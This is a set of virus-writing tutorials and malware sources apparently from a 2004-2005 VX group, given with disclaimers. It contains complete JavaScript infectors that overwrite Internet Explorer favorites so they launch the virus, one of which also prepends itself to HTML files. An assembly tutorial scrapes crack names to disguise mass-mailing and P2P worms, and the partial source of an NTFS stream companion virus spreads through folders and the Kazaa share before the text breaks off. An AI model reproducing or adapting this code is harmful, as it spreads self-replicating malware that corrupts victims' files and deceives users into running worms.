Your favorites, my victims - .url infection in JavaScript DiA Your favorites, my victims - .url infection in JavaScript --------------------------------------------------------- by DiA (c)04 GermanY www.vx-dia.de.vu DiA_hates_machine@gmx.de ____________________________________________________________________________________________ Do with this code what you want. I am not responsible for things you do. If you write new code, or rewrite this, YOU and only YOU are responsible for this code. Take care! __________________________ | 1. Intro | | 2. URL file format | | 3. Code with description | | 4. Idea's and Goal's | | 5. Outro | |__________________________| 1. Intro -------- Everybody has favorite site's in the i-net. But they can't remember all the URL's, so they add every site they use to the "favorites". You can found them on IE under menu "favorites" (what else?!). But you will only see the page's title, like "VX Heavens" or "vx - DiA" ;). But where are the link's to this sites? It store's as *.url file in the "favorites" folder in windows, like "C:\Windows\Favorites\". In this tut we want to overwrite this *.url files, with a .url file linked to our Virus. Let's do this... ...have fun! 2. URL file format ------------------ [InternetShortcut] - hey windows, it's a InternetShurtcut! URL=http://www.vx-dia.de.vu/ - the linked site, our virus will be in location "file:///C:\Windows\4551.htm" WorkingDirectory=C:\WINDOWS\ - not interresting for this tut ShowCommand=7 - not interresting for this tut IconIndex=1 - not interresting for this tut IconFile=C:\WINDOWS\SYSTEM\url.dll - not interresting for this tut Modified=20F06BA06D07BD014D - not interresting for this tut HotKey=1601 - not interresting for this tut 3. Code with description ------------------------ First without description: <html> <head> <script language="JavaScript"> ThisFile = location.href; if (ThisFile.indexOf("file:///") != -1) { wshell = new ActiveXObject("WScript.Shell"); fso = new ActiveXObject("Scripting.FileSystemObject") FavFolder = wshell.SpecialFolders("Favorites") + "\\"; WinFolder = fso.GetSpecialFolder(0) + "\\"; ThisFile = location.href.substr(8); Virus = fso.GetFile(ThisFile); Virus.Copy(WinFolder + "4551.htm"); fso.CreateTextFile(WinFolder + "4551.url"); URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0); URLFile.WriteLine("[InternetShortcut]"); URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm"); URLFile.Close(); FakeURL = fso.GetFile(WinFolder + "4551.url"); Favorit = fso.GetFolder(FavFolder); FindFile = new Enumerator(Favorit.Files); FindFile.moveFirst(); while (FindFile.atEnd() == false) { Victim = FindFile.item(); URLType = new String(Victim); len = URLType.length; if (URLType.indexOf("url",len-3) != -1) { FakeURL.Copy(Victim); } FindFile.moveNext(); } } else { alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu"); } </script> </head> <body link="#000000" alink="#000000" vlink="#000000"> <div align="center"> <h1>HTML.JS.4551 - *.url infection sample</h1><br><br> by DiA (c)04 GermanY<br> <a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br> <a href="mailto:DiA_hates_machine@gmx.de">DiA_hates_machine@gmx.de</a></div> </body> </html> And now with description for better understanding, but ugly lookin ;) : <html> <head> <script language="JavaScript"> // we do it in JavaScript ThisFile = location.href; //looks like "file:///C:\Tests\4551.htm" if (ThisFile.indexOf("file:///") != -1) { // only run virus if location is "file:///" and not "http://" wshell = new ActiveXObject("WScript.Shell"); fso = new ActiveXObject("Scripting.FileSystemObject") // create wshell to read the "Favorites" path // create fso to handle files FavFolder = wshell.SpecialFolders("Favorites") + "\\"; WinFolder = fso.GetSpecialFolder(0) + "\\"; // save "Favorites" path to infect .url files // save "Windows" path to copy virus, and drop Fake .url file ThisFile = location.href.substr(8); Virus = fso.GetFile(ThisFile); // remove "file:///" to handle with the path // get virus file, to copy it Virus.Copy(WinFolder + "4551.htm"); // copy virus to Windows\4551.htm, like "C:\Windows\4551.htm" fso.CreateTextFile(WinFolder + "4551.url"); URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0); URLFile.WriteLine("[InternetShortcut]"); URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm"); URLFile.Close(); FakeURL = fso.GetFile(WinFolder + "4551.url"); // create FakeURL file, every time // write the path to the virus in this .url // now 4551.url looks like: // [InternetShortcut] // URL=file:///C:\Windows\4551.htm // if you execute this 4551.url, you will see the virus again ;) Favorit = fso.GetFolder(FavFolder); FindFile = new Enumerator(Favorit.Files); FindFile.moveFirst(); // get favorite folder to handle with it // create a new enumerator to find all (!) files in this directory // find first file while (FindFile.atEnd() == false) { // do a while(), to find all files in one directory // if no more files -> exit while() Victim = FindFile.item(); // save path of victim, like "C:\Windows\Favorites\GMX.url" URLType = new String(Victim); len = URLType.length; // create a new string object of the victim path, to handle with // get lenght of the path, to check extensions of files if (URLType.indexOf("url",len-3) != -1) { // infect only if last 3 char's contains "url" FakeURL.Copy(Victim); // overwrite victim with dropped FakeURL file } FindFile.moveNext(); // Find next file in "favorites" folder } } // end if else { alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu"); } // if we are on another location (like ftp:// or http://) show only a message, and DON'T run // virus file </script> </head> <body link="#000000" alink="#000000" vlink="#000000"> <div align="center"> <h1>HTML.JS.4551 - *.url infection sample</h1><br><br> by DiA (c)04 GermanY<br> <a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br> <a href="mailto:DiA_hates_machine@gmx.de">DiA_hates_machine@gmx.de</a></div> </body> </html> 4. Idea's and Goal's -------------------- The user will check that somethin is wrong, when no favorite work's anymore! So we must find a way to infect .url's, but load the site that should be load! So, we must read first the real URL before overwrite the .url. Maybe we found the file "vx - DiA.url": 1. Read real URL from this file 2. store it in another file, like "vx - DiA.txt" 3. overwrite this file with FakeURL file When the "vx - DiA.url" are executed, the virus will do the work: 1. Infect files 2. read real URL from "vx - DiA.txt" 3. load this site I am workin on this method, but the problem is that every .url is not the same like: [InternetShortcut] URL=http://www.vx-dia.de.vu Someone look's like: [DEFAULT] BASEURL=http://www.f-prot.de/down/tools-f.php [InternetShortcut] URL=http://www.f-prot.de/down/tools-f.php IconFile=http://www.f-prot.de/favicon.ico IconIndex=1 Another problem is, that most .url files has a own Icon, so we must read the icon location and write this locatin in our FakeURL file, that it look's like: [InternetShortcut] URL=file:///C:\Windows\4551.htm IconFile=http://www.f-prot.de/favicon.ico IconIndex=1 I am working on this problem's, and write a HTML.JS Virus: - .html infection -> prepender - .url infection -> load real site - don't change icon, or something, only change URL=... - and other features... 5. Outro -------- I hope you enjoyed this little tutorial, if you had any comment's send me a mail to DiA_hates_machine@gmx.de ! That's all at this time, now i go on with the problem's =) Have fun... Code on... bye, DiA [06.05.04 - GermanY]

sources

HTML.JS.JackRabbit DiA _____________________________________________ | HTML.JS.JackRabbit | | by DiA[rRlf] (c)04 GermanY | | www.vx-dia.de.vu - DiA_hates_machine@gmx.de | |_____________________________________________| :Disclaimer ----------- I am not responsible for that what you do! You can need the code however you want. You (and only you) are responsible at this time... :Intro ------ This is the very first non overwriting .url (favorites) infector. URL infection means that the Virus infect's InternetShortcuts! It only infect's the InternetShortcuts in the "Favorites" folder. OK, for newbies or idiots: the Virus infect's the Favorites, in IE under the menu "Favorites"! If you would load a favorite, the Virus does it's work. But the kewl thing is, that the Virus load the real favorite after it's work =) The idea comes to my mind in school, and after one week I finished that nice Virus. I am proud that it works ;) Have fun with this little thing, and take care! :Features --------- - .htm and .html prepender, only infect files in current directory if current directory IS NOT the favorites directory - infect all .url (InternetShortcuts) in the "Favorites" folder - if the IconShortcut has a Icon, the Virus hold it - after infection, the Virus load's the real URL - Payload on Day 13 every mounth (MsgBox, and load www.vx-dia.de.vu) :How does the .url infection work --------------------------------- OK, this situation: The Virus found a not infected victim "vx - DiA.url" not infected it looks like this: ---vx - DiA.url--------------------------------- [InternetShortcut] URL=http://www.vx-dia.de.vu/ IconFile=http://vx.helith.net/~DiA/icon.ico IconIndex=1 ---vx - DiA.url--------------------------------- Now the Virus read out the real URL (URL=http://www.vx-dia.de.vu), and stores this string in a file called "vx - DiA.DiA": ---vx - DiA.DiA--------------------------------- http://www.vx-dia.de.vu ---vx - DiA.DiA--------------------------------- A Virus Copy drops under the name "vx - DiA.htm". If the InternetShortcut has a Icon, the Virus read this information from the Victim. Then the Virus overwrites the victim .url with a fake .url: ---vx - DiA.url--------------------------------- [InternetShortcut] URL=file:///C:\Windows\Favorites\vx - DiA.htm IconFile=http://vx.helith.net/~DiA/icon.ico IconIndex=1 ---vx - DiA.url--------------------------------- :What happen's if I would load "vx - DiA" favorite -------------------------------------------------- The Virus does first it's work. Infect all files in "Favorites" folder... Then the Virus read the real URL from the stored file, called "vx - DiA.DiA" (http://www.vx-dia.de.vu) and load this site via "location = RealURL". And that's all, real favorite is loaded in the browser, and the User think's all is allright ;) :Outro ------ OK, that's all about non overwriting .url infection, have fun with this code! For thanks scroll to the bottom ;) Have a nice Day... 17.05.04 - DiA[rRlf] <html><JackRabbit> <head> <script language="JavaScript"> ThisFile = location.href; if (ThisFile.indexOf("file:///") != -1) { wshell = new ActiveXObject("WScript.Shell"); fso = new ActiveXObject("Scripting.FileSystemObject"); FavFolder = wshell.SpecialFolders("Favorites") + "\\"; ThisFile = location.href.substr(8); VirusName = new String(ThisFile); Virus = VirusName.replace("%20"," "); for (i = 0; i < 20; i++) { Virus = Virus.replace("%20"," "); } Virus = fso.GetFile(Virus); VirPath = Virus.ParentFolder + "\\"; if (VirPath != FavFolder) { ReadVirCode = fso.OpenTextFile(Virus,1,false,0); VirCode = ReadVirCode.Read(4912); InfFolder = fso.GetFolder(VirPath); FindFile = new Enumerator(InfFolder.Files); FindFile.moveFirst(); while (FindFile.atEnd() == false) { Victim = FindFile.item(); FileType = fso.GetFile(Victim); if (Victim != Virus) { if (FileType.Type.indexOf("HTML") != -1) { CheckMarker = fso.OpenTextFile(Victim,1,false,0); Marker = CheckMarker.ReadLine(); if (Marker.indexOf("<JackRabbit>") == -1) { ReadVicCode = fso.OpenTextFile(Victim,1,false,0); VicCode = ReadVicCode.ReadAll(); fso.CreateTextFile(Victim); Prepend = fso.OpenTextFile(Victim,2,false,0); Prepend.Write(VirCode+VicCode); Prepend.Close(); } } } FindFile.moveNext(); } } RealURLName = new String(Virus); RealURL = RealURLName.substr(0,RealURLName.length-3) + "DiA"; if (fso.FileExists(RealURL) == true) { ReadURL = fso.GetFile(RealURL); ReadURLLine = ReadURL.OpenAsTextStream(); LoadURL = ReadURLLine.ReadLine(); ReadURLLine.Close(); } else { if (VirPath == FavFolder) { document.write("<b>ERROR! Can't load site</b><br>"); document.write("Please try agian later...<br><br><br>"); document.write(" -the admin JR"); LoadURL = ""; } } Favorit = fso.GetFolder(FavFolder); FindFile = new Enumerator(Favorit.Files); FindFile.moveFirst(); while (FindFile.atEnd() == false) { Victim = FindFile.item(); VictimFile = new String(Victim); if (VictimFile.indexOf("url",VictimFile.length-3) != -1) { NewVirName = new String(Victim); NewVir = NewVirName.substr(0,NewVirName.length-3) + "htm"; Virus.Copy(NewVir); ReadVictim = fso.GetFile(Victim); ReadVictimLine = ReadVictim.OpenAsTextStream(); Result = new String(ReadVictimLine.ReadLine()); while (Result.substr(0,4) != "URL=") { Result = new String(ReadVictimLine.ReadLine()); if (ReadVictimLine.AtEndOfStream == true) { break; } } ReadVictimLine.Close(); URL = new String(Result); if (URL.substr(0,4) != "URL=") { URL = "file:///" + Virus; } else { URL = URL.substr(4,URL.length); } RealURL = NewVirName.substr(0,NewVirName.length-3) + "DiA"; if (fso.FileExists(RealURL) == false) { fso.CreateTextFile(RealURL); RealURLWrite = fso.OpenTextFile(RealURL,2,false,0); RealURLWrite.WriteLine(URL); RealURLWrite.Close(); } ReadVictimLine = ReadVictim.OpenAsTextStream(); Result = new String(ReadVictimLine.ReadLine()); while (Result.substr(0,9) != "IconFile=") { Result = new String(ReadVictimLine.ReadLine()); if (ReadVictimLine.AtEndOfStream == true) { break; } } ReadVictimLine.Close(); IconFile = new String(Result); if (IconFile.substr(0,9) != "IconFile=") { IconFile = ""; } else { IconFile = Result; } ReadVictimLine = ReadVictim.OpenAsTextStream(); Result = new String(ReadVictimLine.ReadLine()); while (Result.substr(0,10) != "IconIndex=") { Result = new String(ReadVictimLine.ReadLine()); if (ReadVictimLine.AtEndOfStream == true) { break; } } ReadVictimLine.Close(); IconIndex = new String(Result); if (IconIndex.substr(0,10) != "IconIndex=") { IconIndex = ""; } else { IconIndex = Result; } fso.CreateTextFile(Victim); InfectURL = fso.OpenTextFile(Victim,2,false,0); InfectURL.WriteLine("[InternetShortcut]"); InfectURL.WriteLine("URL=file:///" + NewVir); InfectURL.WriteLine(IconFile); InfectURL.WriteLine(IconIndex); InfectURL.Close(); } FindFile.moveNext(); } if (VirPath == FavFolder) { location = LoadURL; } PayDate = new Date(); if (PayDate.getDate() == 13) { alert("HTML.JS.JackRabbit Virus\n\nby DiA[rRlf] (c)04 GermanY\n\n\nThis is the first non overwriting .url (Favorites) infector."); alert("YOUR FAVORITES - MY VICTIMS\n\Have fun at this day, but don\'t use your favorites... hrhrhr\n\n\nDiA [rRlf]"); location = "http://www.vx-dia.de.vu/"; } } </script> </head> </html> <html> <head> <title>HTML.JS.JackRabbit - First Generation</title> </head> <body bgColor="#AFAFAF" text="#8F8F8F" link="#000000" alink="#000000" vlink="#000000"> <center> <h1>HTML.JS.JackRabbit</h1><br> <h2>by <a href="http://www.vx-dia.de.vu">DiA</a><a href="http://www.rrlf.de">[rRlf]</a> (c)04 GermanY</h2><br> <h3>This is the First non overwriting .url infector ever, written in JavaScript</h3> <h4>Have fun with this nice creature!</h4> <u>thanks:</u><br> BBB<br> Arik<br> Denny<br> Gunter<br> Daniel<br> Katze<br> Nicole<br> Ben<br> Pascal<br> Herr H.<br> Marcel<br> Cindy<br> SPTH<br> philet0ast3r<br> DR-EF<br> vh<br> ElToro<br> Wesely<br> rRlf<br> Assi.GmbH<br> herm1t<br> BMX<br> Bad Luck 13<br> MPR<br> Hardcore<br> beer<br> weed<br> whisky<br> and all i forgot </center> </body> </html>

articles

Save your fingers - get your fake names from the i-net DiA ______________________________________________________________ | | | Save your fingers - get your fake names from the i-net |# | »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» |# | |# | by DiA/rrlf (c)2005 |# | www.vx-dia.de.vu :: DiA_hates_machine@gmx.de |# |______________________________________________________________|# ############################################################### _Overview___________________________________ | | | 1_Intro |# | 2_How to do? |# | 3_Gimme a code, please! |# | 4_Outro |# |____________________________________________|# ############################################# .Disclaimer »»»»»»»»»» The author of this article is NOT responsible for possible damages in case of informations you getting here. You do your own things with your own risk, please don't do anything stupid for your own security. This document is for educational purpose only. If you do NOT agree this, please close this for your own pleasure! .1_Intro »»»»»»» Maybe you know this situation, you write a pretty good massmailer, i-net or P2P worm and you need some ideas for the fake names. You are sick seeing names like "Damn_Fine_Porn.mpg .exe" or "Photoshop Crack working!.exe". So what to do? Get some inspiration from the internet, go to some warez/crackz sites and copy and paste some real crack names including application name, exact version number and maybe the author of the crack. Looking a bit realer then "Micr0soft all products keygen.exe", huh?! You wanna do some good stuff, including many names... you are now copy and paste your name number 34, stupid work, no? At this point I ask you, why do you copy and paste a already existing huge database of names? Just write a simple but effective code and get thousends of names at runtime :). So read on and see how easy it is... .2_How to do? »»»»»»»»»»»» OK, what we need for this tutorial is a internet connection. Without it will not work of course. Now save this file - http://crack.ms/cracks/a_1.shtml - local as - fakenames.txt -. Take a look, at the head of this file you see some uninteressting stuff, like popup scripts, meta tags and links. But if you go to the end of this file you see a huge list of the crack names. Thats what we want. Let's pick out one link including the name that we want to extract: <a href="crack.ms?id=19003" target=_blank>ABCalculator 1.1.0 by DBC</a> And one more: <a href="crack.ms?id=1882535" target=_blank>Aare CD Ripper v3.2 by HTBTeam</a> Fine, now when you have a look you will fast see that every name is between (dword - 4 bytes) "ank>" and "</a>". So we have to find "ank>" and we have the start of the name. Byte by byte we search for the end "</a>" and so we have the length of the name. We know the start of the name and the length, sweet, we can extract it ;). With this method we can do so name by name, until we are at the end of the file. Remember that this is only a example, there are more then 1.000.000 crackz/ warez/serialz sites on the internet, you only have to know how the structure of the HTML files they use is. Let's do a little to-do list for our example application: 1. Make a random valid URL (eg w_2.shtml) 2. Download this file 3. Open the file 4. Get the file size 5. If it's not big enough goto 1. 6. Free enough memory 7. Read whole content in memory 8. Close File 9. Find start of next fake name "ank>" 10. Find end of next fake name "</a>" 11. Extract fake name 12. What you wanna do with this name (in example log in a .htm file) 13. If end of file goto 15. 14. Jump to 9. 15. Exit If it sounds hard to do for you, then the only reason for this is my shitty english ;D. Just take a look at the small code, and you will see that it is pretty easy to do. .3_Gimme a code, please! »»»»»»»»»»»»»»»»»»»»»»» ;-----ExtractNames.asm-----cut-----start--------------------------------------------- include "%fasminc%\win32ax.inc" ;equates ExtractNames: call MakeURL ;make a random url (a-z,1-9) invoke URLDownloadToFile,\ ;download it baby 0,\ ;no activeX required FakeNamesURL,\ ;download this file FakeNamesFile,\ ;save local to this file 0,\ ;reserved 0 ;no interface cmp eax, 0 ;error if it is not null jne ExtractNames ;then make new URL and download again WaitForDownload: invoke CreateFile,\ ;open downloaded file FakeNamesFile,\ ;open this file (in current folder) GENERIC_READ,\ ;only need read access FILE_SHARE_READ,\ ;---""--- 0,\ ;dont need security attributes OPEN_EXISTING,\ ;we want to open the file FILE_ATTRIBUTE_NORMAL,\ ;normal attributes 0 ;no template file cmp eax, INVALID_HANDLE_VALUE ;if error then the download is not finished je WaitForDownload ;try to open again mov dword [FileHandle], eax ;save file handle invoke GetFileSize,\ ;get file size of downloaded file dword [FileHandle],\ ;via file handle 0 ;just get low size mov dword [FileSize], eax ;save file size cmp eax, 7000d ;if its <7000 bytes, then its the error page from crack.ms ja GetMemory ;if not go to get memory invoke CloseHandle,\ ;close handle dword [FileHandle] ;to delete it invoke DeleteFile,\ ;delete invalid fake names file FakeNamesFile ;delete this jmp ExtractNames ;repeat all GetMemory: invoke GlobalAlloc,\ ;get enough memory GMEM_MOVEABLE,\ ;allocation attribute, moveable dword [FileSize] ;that mich memory we need mov dword [MemHandle], eax ;save handle invoke GlobalLock,\ ;get memory start dword [MemHandle] ;via handle mov dword [MemStart], eax ;save start invoke ReadFile,\ ;read whole content from file dword [FileHandle],\ ;open file, handle dword [MemStart],\ ;buffer start dword [FileSize],\ ;read that much BytesRW,\ ;bytes read 0 ;no overlapped structure invoke CloseHandle,\ ;we can close the file dword [FileHandle] ;via handle ;***only for this example*** invoke CreateFile,\ ;make the output file OutputFile,\ ;file name GENERIC_WRITE,\ ;with write access FILE_SHARE_WRITE,\ ;---""--- 0,\ ;no security CREATE_ALWAYS,\ ;create it FILE_ATTRIBUTE_NORMAL,\ ;normal attributes 0 ;no temp file mov dword [FileHandle], eax ;save handle ;***only for this example*** mov ebx, dword [MemStart] ;get memory start in ebx add ebx, 3667d ;go over the file header (scripts, meta, links...) ;(keep in mind that this is the structure ; of files on crack.ms, if you use another site ; the structure is different!) push ebx ;save to stack FindMoreNames: pop ebx ;get file position from stack xor ecx, ecx ;set name length counter to null GetStartOfName: cmp dword [ebx], "</bo" ;end of html file (you know </body></html>) je FindNamesEnd ;then goto end cmp dword [ebx], "ank>" ;start of fake name? je GetEndOfName ;if so then get end of name inc ebx ;search next byte jmp GetStartOfName ;go get it dude GetEndOfName: cmp dword [ebx], "</a>" ;end of fake name? je ExtractName ;if so then extract the name inc ecx ;to get fake name length inc ebx ;next place jmp GetEndOfName ;search it ExtractName: push ebx ;save current position in file sub ebx, ecx ;go to the start of string add ebx, 4d ;go after "ank>" sub ecx, 4d ;delete that "</a>" push ecx ;save length of name mov esi, ebx ;source mov edi, FakeName ;destination rep movsb ;copy the whole name to FakeName mov dword [edi], 0 ;clear all after ;**************************************** ;**************************************** ; at this point you can do whatever you want ; with the fake file name! pointer to fake name ; is "FakeName"... ;**************************************** ;**************************************** ;***only for this example*** pop ecx ;get length of name invoke WriteFile,\ ;write the fake name to file dword [FileHandle],\ ;via handle FakeName,\ ;write this ecx,\ ;length of fake name BytesRW,\ ;bytes written 0 ;overlapped, fuck off invoke WriteFile,\ ;write <br> to the file dword [FileHandle],\ ;via handle Break,\ ;write <br> 4,\ ;length BytesRW,\ ;bytes written 0 ;overlapped, fuck off ;***only for this example*** jmp FindMoreNames ;go get next name FindNamesEnd: ;***only for this example*** invoke CloseHandle,\ ;close output file dword [FileHandle] ;via handle ;***only for this example*** invoke GlobalUnlock,\ ;unlock memory dword [MemHandle] ;handle invoke GlobalFree,\ ;free it! dword [MemHandle] ;via handle invoke DeleteFile,\ ;delete downloaded file FakeNamesFile ;this invoke MessageBox,\ ;show a msgbox that it's done 0,\ "fake names extracting done",\ FakeNamesURL,\ 0 invoke ExitProcess,\ 0 ;end my friend MakeURL: ;procedure invoke GetTickCount ;we only want random stuff in al CharMakeValid: cmp al, 97d ;if its under "a" jb CharAdd ;then add some stuff cmp al, 122d ;if its above "z" ja CharSub ;then sub some stuff jmp CharIsValid ;kewl, now its valid CharAdd: add al, 18d ;add 18 and see if its now valid jmp CharMakeValid ;check it CharSub: sub al, 18d ;sub 18 jmp CharMakeValid ;now a valid character? CharIsValid: mov edi, FakeNamesURL ;pointer to url add edi, 23d ;go to the end of the string stosb ;save char at end (eg http://crack.ms/cracks/m) invoke GetTickCount ;get al again DigitMakeValid: cmp al, 49d ;if its under "1" jb DigitAdd ;the add somethin cmp al, 57d ;if its above "9" ja DigitSub ;then subtract it jmp DigitIsValid ;make whole name DigitAdd: add al, 3d ;add 3 jmp DigitMakeValid ;check if its now valid DigitSub: sub al, 3d ;sub 3 jmp DigitMakeValid ;chek if it is valid now DigitIsValid: mov byte [edi], "_" ;eg http://crack.ms/cracks/m_ inc edi ;go behind the "_" stosb ;save digit (eg http://crack.ms/cracks/m_2) mov dword [edi], ".sht" ; http://crack.ms/cracks/m_2.sht mov dword [edi + 4], "ml" ; http://crack.ms/cracks/m_2.shtml ret ;return to call Datas: FakeNamesURL db "http://crack.ms/cracks/",0 ;site to download file from rb 10d ;space for file name (random) FakeNamesFile db "fake.names",0 ;filename to save FileHandle dd ? ;file handle to save FileSize dd ? ;file size to get enough memory MemHandle dd ? ;handle for allocate memory MemStart dd ? ;start of memory BytesRW dd ? ;number of bytes read/write OutputFile db "FakeNames.htm",0 ;save here the names FakeName rb 100d ;save here the fake name Break db "<br>",0 ;just to make a break Imports: data import ;import all needed api's library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ urlmon, "URLMON.DLL" import kernel32,\ CreateFile, "CreateFileA",\ GlobalAlloc, "GlobalAlloc",\ GlobalLock, "GlobalLock",\ ReadFile, "ReadFile",\ GetFileSize, "GetFileSize",\ CloseHandle, "CloseHandle",\ GlobalUnlock, "GlobalUnlock",\ GlobalFree, "GlobalFree",\ WriteFile, "WriteFile",\ DeleteFile, "DeleteFileA",\ GetTickCount, "GetTickCount",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import urlmon,\ URLDownloadToFile, "URLDownloadToFileA" end data ;-----ExtractNames.asm-----cut-----end----------------------------------------------- .4_Outro »»»»»»» Funny, no? That small code and that much names ;). But keep in mind that this is only a basic example. For advanced usage you need, for example, to check if there is an internet connection or not. Also you don't need to extract only fake names for your worms. What's about subject's or body's? Maybe a report from a AV site about a new dangerous worm in the wild, and you send the cleaning program?! Or what about newsgroups and there post's. It's now in your hand to find usefull sites for your fake names, fake subjects and fake bodys. Be creative ;), have a nice day and happy coding! DiA/rrlf :: 08.02.2005

sources

Win2k.Sejay DiA ; ____________________________ ; | | ; | Win2k.Sejay |# ; | Stream Companion Virus |## ; | |## ; | coded by DiA/rrlf |## ; | (c)2005 Germany |## ; | |## ; | DiA_hates_machine@gmx.de |## ; | http://www.vx-dia.de.vu |## ; |____________________________|## ; ############################## ; ############################# ; ; ; ; .disclaimer ; This is a source code of a working virus! If you rewrite, copy or assemble it ; you and only YOU are responsible for the things you do! Take care... ; ; ; .intro ; This is a companion virus, using the "Stream Companion" method. Only working ; on NTFS formated harddrives, because FAT don't have the streaming feature. ; Inspired from the first "Stream Companion" virus Win2k.Stream (also the only ; one source I can find to learn from). Dedicated to my mate Erik, who is the ; name-father of this virus. I have heavy commented the source, hopy you like ; it! Only tested under WinXP SP1... ; ; ; .description ; -check OS, if its not Win2000 or above show a fake error message, because virus ; can't execute host or infecting files ; ; -working with a temp file, stored in windows directory as Sejay.DiA ; ; -infect files by creating a new stream with name of last 4 bytes from victim file ; eG Whatever.exe copy to Whatever.exe:ever ; then copy virus over the main stream Whatever.exe ; ; -the virus checks if the stream already exists, if so the file is already infected ; ; -execute host by creating stream name and run it eG execute Whatever.exe:ever , ; if something goes wrong it shows a fake message (also on first generation) ; ; -infect current folder, all sub-folders and the Kazaa Shared Folder (aka P2P spreading) ; ; -log every infected file in a file stored in windows directory called Sejay.htm , ; and if payload date (03.02) the virus sets this file to start page from IE, when ; somethin goes wrong it shows a simple message box with a lyric from Bad Luck 13 ; ; -unpacked the virus is 5632bytes huge, after upx'ing its 3072bytes small. ; ; ; .assemble ; Assemble it with the Flatassembler GUI version 1.56, you can get this nice assembler ; for free at http://flatassembler.net ! ; ; ; .outro ; For bug report or greets/fucks please mail me at DiA_hates_machine@gmx.de or do a entry ; in my guestbook at http://www.vx-dia.de.vu . And now have fun with this little creature... ; ; ; .source ;-----Sejay.asm-----start-------------------------------------------------------------------------------------------------- include "%fasminc%\win32ax.inc" ;equates Sejay: ;virus start invoke GetVersion ;get os verion (al=05 -> win2000 and above [eg winxp is 0A280105h]) cmp al, 05d ;check al for 05 jne NonNTFS ;if not show some fake error msg invoke GetModuleFileName,\ ;get virus file name 0,\ ;no handle VirusFile,\ ;save here full path 256d ;size of buffer cmp eax, 0 ;error? no virus path, no infection je ExecuteHost ;run host without infection :@ invoke GetWindowsDirectory,\ ;to store the temp file in WinTempDir,\ ;save here 256d ;size of buffer cmp eax, 0 ;error je ExecuteHost ;narf... mov esi, WinTempDir ;to check if the path is valid GetPathEnd: cmp byte [esi], 0 ;end of string? je CheckIfValid ;check for "\" at the end inc esi ;address + 1 jmp GetPathEnd CheckIfValid: cmp byte [esi - 1], "\" ;check for "\" at the end je BindStrings ;then dont append the \ mov byte [esi], "\" ;place a \ at the end of the string mov dword [esi + 1], 0 ; ,0 BindStrings: invoke lstrcat,\ ;append TempFile string via api WinTempDir,\ ;append to windows path TempFile ;append sthis invoke GetWindowsDirectory,\ ;to get payload file PayTempFile,\ ;store it here 256d ;size of buffer mov esi, PayTempFile ;check if it is valid GetPayEnd: cmp byte [esi], 0 ;end? je CheckValidness ;same as above inc esi jmp GetPayEnd ;again CheckValidness: cmp byte [esi - 1], "\" ;check string end for \ je MakePayFile ;all is ok mov byte [esi], "\" ;place \ at end mov dword [esi + 1], 0 ;zero MakePayFile: invoke lstrcat,\ ;bind strings PayTempFile,\ ;append to win dir PayFile ;the filename invoke CreateFile,\ ;open temp file PayTempFile,\ ;this GENERIC_READ + GENERIC_WRITE,\ ;read n write access FILE_SHARE_WRITE,\ ;open if can write 0,\ ;no security attributes OPEN_EXISTING,\ ;open the file FILE_ATTRIBUTE_NORMAL,\ ;normal 0 ;no handle cmp eax, INVALID_HANDLE_VALUE ;error? jne SaveHandle ;if not dont create file again call CreatePayloadFile ;if not exist create payload file SaveHandle: mov dword [PayHandle], eax ;save handle call InfectFolder ;infect current folder (all files) invoke FindFirstFile,\ ;get some folders Folder,\ ;by search for *.* Win32FindData ;already defined mov dword [FolderHandle], eax ;save handle FindMoreFolder: cmp eax, 0 ;no more folders?! je CloseFolderHandle ;then close handle and execute host stream invoke GetCurrentDirectory,\ ;to get a valid SetCurrentDir.. path 256d,\ ;size of buffer VictimFolder ;save there mov esi, VictimFolder ;get end of string GetEndDir: cmp byte [esi], 0 ;check for zero -> end je HaveEndDir ;check for validness inc esi ;next byte jmp GetEndDir ;check HaveEndDir: cmp byte [esi - 1], "\" ;is there a \ je DirValid ;if so, it is valid mov byte [esi], "\" ;if not make it valid mov dword [esi + 1], 0 ;end of string DirValid: mov esi, Win32FindData.cFileName ;get end of victim string GetEndVictim: cmp byte [esi], 0 ;end of string? je HaveEndVictim ;if so jmp to ... inc esi ;next byte jmp GetEndVictim ;check it baby HaveEndVictim: cmp byte [esi - 1], "." ;found a . or .. ?! je FindNextFolder ;if so find next cmp byte [esi - 4], "." ;is it a file? je FindNextFolder ;if so find next mov byte [esi], "\" ;to get a valid path mov dword [esi + 1], 0 ;zero at the end invoke lstrcat,\ ;bind strings VictimFolder,\ ;string1 Win32FindData.cFileName ;add this invoke SetCurrentDirectory,\ ;change directory VictimFolder ;to this cmp eax, 0 ;error? je FindNextFolder ;then find next call InfectFolder ;infect it baby mov esi, VictimFolder ;to change directory back GetFirstFolder1: cmp byte [esi], 0 ;check for end je HaveFirstFolder1 ;have it inc esi ;continue jmp GetFirstFolder1 ;... HaveFirstFolder1: sub esi, 2 ;get before "\" GetFirstFolder2: cmp byte [esi], "\" ;check for \ je HaveFirstFolder2 ;change back dec esi ;-1 jmp GetFirstFolder2 ;check HaveFirstFolder2: mov dword [esi + 1], 0 ;clear all after invoke SetCurrentDirectory,\ ;set it new VictimFolder ;to first folder FindNextFolder: invoke FindNextFile,\ ;find next dword [FolderHandle],\ ;the handle Win32FindData ;the structure jmp FindMoreFolder ;go get it CloseFolderHandle: invoke CloseHandle,\ ;close handle dword [FolderHandle] ;this invoke RegOpenKeyEx,\ ;open key HKEY_CURRENT_USER,\ ;with this handle KazaaShare,\ ;this subkey 0,\ ;reserved KEY_QUERY_VALUE,\ ;read a value KazaaRegHandle ;save there the handle cmp eax, 0 ;error? jne ExecuteHost ;no kazaa installed invoke RegQueryValueEx,\ ;read the value (shared folder path) dword [KazaaRegHandle],\ ;handle KazzaFolder,\ ;DlDir0 0,\ ;reserved 0,\ ;its a string 